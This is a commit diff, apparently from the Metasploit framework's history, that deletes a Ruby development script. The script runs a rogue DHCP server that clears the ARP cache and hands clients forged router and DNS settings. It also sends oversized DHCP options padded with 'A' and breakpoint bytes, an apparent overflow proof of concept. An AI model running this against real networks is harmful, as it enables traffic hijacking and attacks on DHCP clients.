git-svn-id: file:///home/svn/framework3/trunk@3751 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
5c142b2059
commit
03a5a4f787
147
dev/bmc/dhcp.rb
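--- a/dev/bmc/dhcp.rb
+++ /dev/null
@@ -1,147 +0,0 @@
-#!ruby
-
-require 'socket'
-
-$port = 67
-$magic = "\x63\x82\x53\x63"
-$serverip = '10.50.0.116'
-
-def respond(message = 'test', dstip = '255.255.255.255')
-warn "sending response"
-s = UDPSocket.open
-s.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, 1)
-s.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEADDR, true)
-s.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEPORT, true)
-s.bind('<any>', 68)
-s.send(message, 0, dstip, 67)
-p message.unpack('H*')[0].upcase
-end
-
-def packip (ip)
-return ip.split('.').collect { |i| i.to_i }.pack('CCCC')
-end
-
-def packmac (mac)
-return mac.split(':').pack('H2H2H2H2H2H2')
-end
-
-def parse (request)
-if request.length < 236
-return
-end
-
-transaction = request[4..8].unpack('N')[0]
-mac = request[28..33].unpack('H2H2H2H2H2H2').join(':')
-ip = '10.50.0.136'
-
-begin
-ip = request[246+ a[246..-1].index("\x32\x04")+2,4].unpack('C*')
-rescue
-end
-return [transaction, mac, ip]
-end
-
-def encode (type, value)
-if (value.length > 255)
-raise "invalid option"
-end
-
-return [type, value.length].pack('CC') + value
-end
-
-def offer ( transaction, mac, ip = '10.10.10.12' )
-
-packet =
-"\x02\x01\x06\x00" + #Preamble
-[transaction, 0 ].pack('NN') + # transaction + flags
-
-packip('0.0.0.0') + # client ip
-packip(ip) + # server ip
-packip('172.16.16.1') + # next server IP
-packip('0.0.0.0') + # relay agent IP
-
-packmac(mac) + #Client MAC
-"\x00" * 10 + # chaddr padding
-"\x00" * (16 * 4) + # server hostname
-"\x00" * (16 * 8) + # boot filename
-$magic + # magic cookie
-encode(0x35, "\x02") + # message type
-encode(0x36, packip($serverip)) + # Serevr identifier
-encode(0x33, "\x00\x00\xa8\xc0") + # IP lease time
-encode(0x01, "\xFF\xFF\x00\x00") + # subnet mask
-encode(0x0f, "metasploit.com") + # domain name
-encode(0x03, packip($serverip)) + # router IP
-encode(0x06, packip($serverip) + packip($serverip)) + # DNS (2 dns servers)
-encode(0x2c, packip($serverip)) + # netbios name server
-encode(0x2e, "\x08") + # node type
-"\xff" # no more options
-end
-
-def request ( transaction, mac, ip = '10.10.10.12' )
-packet =
-"\x02\x01\x06\x00" + #Preamble
-[transaction, 0 ].pack('NN') + # transaction + flags
-
-packip('0.0.0.0') + # client IP
-
-packip(ip) + # Server IP
-packip($serverip) + # next server IP
-packip('0.0.0.0') + # relay agent IP
-
-packmac(mac) + # client MAC address
-"\x00" * 10 + # chaddr padding
-"\x00" * (16 * 4) + # server hostname
-"\x00" * (16 * 8) + # boot filename
-$magic + # magic cookie
-
-encode(0x35, "\x05") +
-encode(0x36, packip($serverip)) + # server identifier
-encode(0x33, "\x00\x00\xa8\xc0") + # lease time
-encode(0x01, packip('255.255.0.0')) + # subnet
-encode(0x03, packip($serverip)) + # router IP
-encode(0x06, packip($serverip) + packip($serverip)) + # DNS SERVER
-encode(0x2c, packip('10.1.1.100')) + # netbios name server
-encode(0x2e, "\x08") +
-
-encode(0x0f, "AB" + "A" * 0xfd) +
-encode(0xfa, ("A" * 0x8f) + ("\xcc" * 0x70)) +
-encode(0xfa, "\xCC" * 0xff) +
-encode(0xfa, "\xCC" * 0xff) +
-encode(0xfa, ("\x01\x0B" * 0x7f) + "\x00")+
-"\xff"
-end
-
-system("arp -da")
-sThread = Thread.start do # run server in a thread
-server = UDPSocket.open
-server.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEADDR, true)
-server.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEPORT, true)
-server.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, 1)
-server.bind('<any>', $port)
-while (1)
-request = server.recvfrom(1024)
-(transaction, mac, ip) = parse(request[0])
-p ip
-if !transaction.nil?
-p 'here1'
-p mac
-# if mac == "00:0c:29:d6:d1:62"
-p 'here2'
-system("echo arp -s #{ip} #{mac}")
-system("arp -s #{ip} #{mac}")
-respond(offer(transaction, mac, ip), ip)
-sleep(1)
-respond(request(transaction, mac, ip), ip)
-# else
-#p "not right mac!"
-#end
-else
-p "not dhcp"
-end
-end
-end
-
-respond()
-respond()
-
-sThread.join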